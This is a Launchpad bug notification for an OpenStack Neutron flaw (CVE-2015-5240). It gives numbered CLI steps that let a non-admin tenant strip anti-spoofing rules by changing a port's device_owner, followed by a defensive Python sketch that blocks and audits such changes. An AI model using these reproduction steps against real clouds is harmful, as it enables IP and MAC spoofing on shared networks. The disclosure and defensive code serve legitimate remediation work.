*** This bug is a duplicate of bug 1489111 ***
https://bugs.launchpad.net/bugs/1489111
Thanks for filing this. This was actually a vulnerability fixed later in
bug 1489111. I think the part that was overlooked was that this could be
done on shared networks.
** This bug has been marked a duplicate of bug 1489111
[OSSA 2015-018] IP, MAC, and DHCP spoofing rules can be bypassed by changing device_owner (CVE-2015-5240)
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1417791
Title:
Neutron allows non-admin user to circumvent port security via port-
update device_owner
Status in neutron:
New
Status in OpenStack Security Advisory:
Won't Fix
Bug description:
Neutron allows a non-admin tenant to circumvent anti-spoofing port
security by updating the device-owner to 'network:None' and rebooting
the instance.
How to reproduce:
1. Create a new tenant: `keystone tenant-create --name demo --enable=true`
2. Create a new user in that tenant: `keystone user-create --name demo --tenant $TENANT_ID --pass $PASSWORD --enabled true`
3. Switch to that new user: `export OS_USERNAME=demo; export OS_TENANT_NAME=demo; export OS_PASSWORD=$PASSWORD`
4. Create a keypair: `nova keypair-add demo-key --pub-key ~/.ssh/authorized_keys`
5. Create a security group: `neutron security-group-create demo-secgroup`
6. Add a permit rule to that security group: `neutron security-group-rule-create demo-secgroup --remote-ip-prefix 0.0.0.0/0`
7. Deploy a new instance: `nova boot --flavor m1.tiny --image ubuntu-14.04 --nic net-id=$NETWORK_ID --key-name demo-key --security-groups demo-secgroup --poll demo-instance`
8. Find the instance's neutron port: `neutron port-list`
9. Update neutron port device owner: `neutron port-update $PORT_ID --device_owner network:None`
10. Verify neutron port device owner updated: `neutron port-show $PORT_ID`
11. Reboot instance: `nova reboot $INSTANCE_ID`
When the instance comes back up, it will not have anti-spoofing port
security rules present and can source traffic from any IP and MAC
combination.
It doesn't appear that this was intended; in Juno the stock
neutron/policy.conf includes:
```
"update_port": "rule:admin_or_owner",
"update_port:port_security_enabled": "rule:admin_or_network_owner",
```
But the port owner is permitted to modify the device-owner attribute
of the port which allows circumventing the port security.
I would recommend protecting the device_owner and device_id port
attributes so they can only be modified by an admin user.
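As an added example (not part of the bug report or of Neutron's own code), the following Python sketches the two defensive points the report makes: rejecting non-admin changes to device_owner/device_id, and auditing existing ports for the bypass pattern (a `network:` device_owner on a port that is still bound to an instance). The list of legitimate `network:` owners and the sample port records are assumptions constructed for the example.

```python
# Added example, not from the bug report or Neutron. It models the report's two
# defensive points: a check that only admins may change device_owner/device_id,
# and an audit flagging ports whose device_owner carries the "network:" prefix
# (exempting them from anti-spoofing rules) while still bound to an instance.
from typing import Dict, Iterable, List

# Attributes the report recommends restricting to admin users.
PROTECTED_ATTRS = frozenset({"device_owner", "device_id"})

# Owners that legitimately use the "network:" prefix (assumed, partial list).
KNOWN_SERVICE_OWNERS = frozenset({
    "network:dhcp", "network:router_interface",
    "network:router_gateway", "network:floatingip",
})


def check_port_update(is_admin: bool, requested: Dict[str, str]) -> List[str]:
    """Return protected attributes a non-admin caller tries to change.

    Empty list: the update may proceed. Non-empty: reject with 403.
    """
    if is_admin:
        return []
    return sorted(PROTECTED_ATTRS.intersection(requested))


def audit_ports(ports: Iterable[Dict[str, str]]) -> List[str]:
    """Return ids of ports that match the bypass pattern in the report:
    a "network:" device_owner that is not a known service owner, on a port
    that still has a device_id (an instance port that shed its rules)."""
    flagged = []
    for port in ports:
        owner = port.get("device_owner", "")
        if (owner.startswith("network:")
                and owner not in KNOWN_SERVICE_OWNERS
                and port.get("device_id")):
            flagged.append(port["id"])
    return flagged


# Constructed sample records resembling `neutron port-show` output.
SAMPLE_PORTS = [
    {"id": "port-a", "device_owner": "compute:nova", "device_id": "vm-1111"},
    {"id": "port-b", "device_owner": "network:dhcp", "device_id": "dhcp-1"},
    {"id": "port-c", "device_owner": "network:None", "device_id": "vm-2222"},
]
```

Running `audit_ports(SAMPLE_PORTS)` flags only `port-c`, the tampered instance port; the DHCP service port is left alone because its owner is in the known list.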